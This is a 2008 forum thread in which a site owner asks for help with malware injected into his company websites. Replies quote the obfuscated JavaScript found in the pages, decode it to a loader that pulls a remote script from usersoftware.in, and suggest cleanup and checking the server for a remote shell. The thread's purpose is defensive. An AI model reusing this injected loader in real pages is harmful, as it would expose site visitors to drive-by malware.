Author Topic: MAlware Found on our Server - Novice here - Need some advice  (Read 10005 times)

0 Members and 1 Guest are viewing this topic.

July 22, 2008, 03:58:44 pm
Read 10005 times

Toff

  • Newbie

  • Offline
  • *

  • 3
Hello everyone,

A came across your forum just googling it up. Thank god I finally found a place to hopfully find an answer to this.
Around may we received replies from customers stating that we had a virus our on website.

http://www.malwaredomainlist.com/mdl.php?search=usersoftware.in&colsearch=All&quantity=50

If you visit:
www.graduationsource.com or www.avantisystemsusa.com

usersoftware.in loads in the loading screen.

I have no idea what to do. No idea how to fix the problem and no idea even where to begin. Any input would be greatly appreciated.

July 22, 2008, 04:35:55 pm
Reply #1

sowhat-x

  • Guest
Code: [Select]
<script language="javascript">
var xqv='%';document.write(unescape('%3C%73%63%72'+xqv+'69'+xqv+'70'+xqv+'74'+xqv+'20'+xqv+'6C'+xqv+'61'+xqv+'6E'+xqv+'67%75%61%67%65%3D'+xqv+'22'+xqv+'4A'+xqv+'61%76%61%53%63%72%69%70'+xqv+'74'+xqv+'22'+xqv+'3E'+xqv+'0A%76%61%72%20%6C%3D%27%68%74%74%70'+xqv+'3A'+xqv+'2F%2F%75%73%65%72%73%6F%66'+xqv+'74%77%61%72%65%2E%69%6E'+xqv+'2F%78%71%2F%76'+xqv+'73'+xqv+'74'+xqv+'61%76%6B%61%2E%70%68%70%3F'+xqv+'72'+xqv+'3D%27%3B%76%61%72%20'+xqv+'72%3D%65%6E'+xqv+'63%6F%64%65%55%52%49%43%6F%6D%70%6F'+xqv+'6E%65'+xqv+'6E%74'+xqv+'28'+xqv+'64'+xqv+'6F%63%75%6D%65%6E'+xqv+'74'+xqv+'2E'+xqv+'72'+xqv+'65%66%65%72%72%65%72'+xqv+'29'+xqv+'3B'+xqv+'69'+xqv+'66%28%72%29%7B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%73%72%63%3D%27%2B%6C%2B%72%2B%27%3E%3C%2F%73%63%72%27%2B%27%69%70%74%3E%27%29%3B%7D%0A%3C%2F%73%63%72%69%70%74%3E' ));
</script>

A quick look shows that the above is the malicious code,
that has been injected/infecting over there...when decoded,it resolves to:

Code: [Select]
<script language="JavaScript">
var l='http://usersoftware.in/xq/vstavka.php?r=';var r=encodeURIComponent(document.referrer);if(r){document.write('<script src='+l+r+'></scr'+'ipt>');}
</script>

Meaning,as a first step re-action,you should grep through your htmls and clean it...

July 22, 2008, 05:06:07 pm
Reply #2

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
Hi Toff

I assume you have root access to the server.

Comment out this whole sction of script and it will block the link to usersoftware.in
Code: [Select]
<script language="javascript">
var xqv='%';document.write(unescape('%3C%73%63%72'+xqv+'69'+xqv+'70'+xqv+'74'+xqv+'20'+xqv+'6C'+xqv+'61'+xqv+'6E'+xqv+'67%75%61%67%65%3D'+xqv+'22'+xqv+'4A'+xqv+'61%76%61%53%63%72%69%70'+xqv+'74'+xqv+'22'+xqv+'3E'+xqv+'0A%76%61%72%20%6C%3D%27%68%74%74%70'+xqv+'3A'+xqv+'2F%2F%75%73%65%72%73%6F%66'+xqv+'74%77%61%72%65%2E%69%6E'+xqv+'2F%78%71%2F%76'+xqv+'73'+xqv+'74'+xqv+'61%76%6B%61%2E%70%68%70%3F'+xqv+'72'+xqv+'3D%27%3B%76%61%72%20'+xqv+'72%3D%65%6E'+xqv+'63%6F%64%65%55%52%49%43%6F%6D%70%6F'+xqv+'6E%65'+xqv+'6E%74'+xqv+'28'+xqv+'64'+xqv+'6F%63%75%6D%65%6E'+xqv+'74'+xqv+'2E'+xqv+'72'+xqv+'65%66%65%72%72%65%72'+xqv+'29'+xqv+'3B'+xqv+'69'+xqv+'66%28%72%29%7B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%73%72%63%3D%27%2B%6C%2B%72%2B%27%3E%3C%2F%73%63%72%27%2B%27%69%70%74%3E%27%29%3B%7D%0A%3C%2F%73%63%72%69%70%74%3E' ));
</script>

It looks as thou they may also be other malware on the sites, which will take further digging to revel.

Please post back as to how you got on.
Malware analysised using clarified analyzer to record and document how malware behaves in a networking environment

July 22, 2008, 05:10:00 pm
Reply #3

Toff

  • Newbie

  • Offline
  • *

  • 3
After removing all of the coding it automatically embeds itself again on all of the pages.  

July 22, 2008, 05:16:03 pm
Reply #4

sowhat-x

  • Guest
Toff,say until a few more digging/analysis takes place,
have a view at the links mentioned in this post here,to get an idea of what's been happening...
http://www.malwaredomainlist.com/forums/index.php?topic=1965.msg3919#msg3919
They might also give you a few ideas on where to start searching in your server,
for places where extra malicious scripts/code might reside etc...

July 22, 2008, 05:34:22 pm
Reply #5

Toff

  • Newbie

  • Offline
  • *

  • 3
Alright perfect, I'm going to have my programmers go through everything. Thanks for the input!

July 22, 2008, 08:06:54 pm
Reply #6

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Just an FYI ..... if the script is re-appearing after removal, then you've got something running on the server that shouldn't be, which likely means you've also got a remote shell on there too (which will be how they put the files there after they exploited the server)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net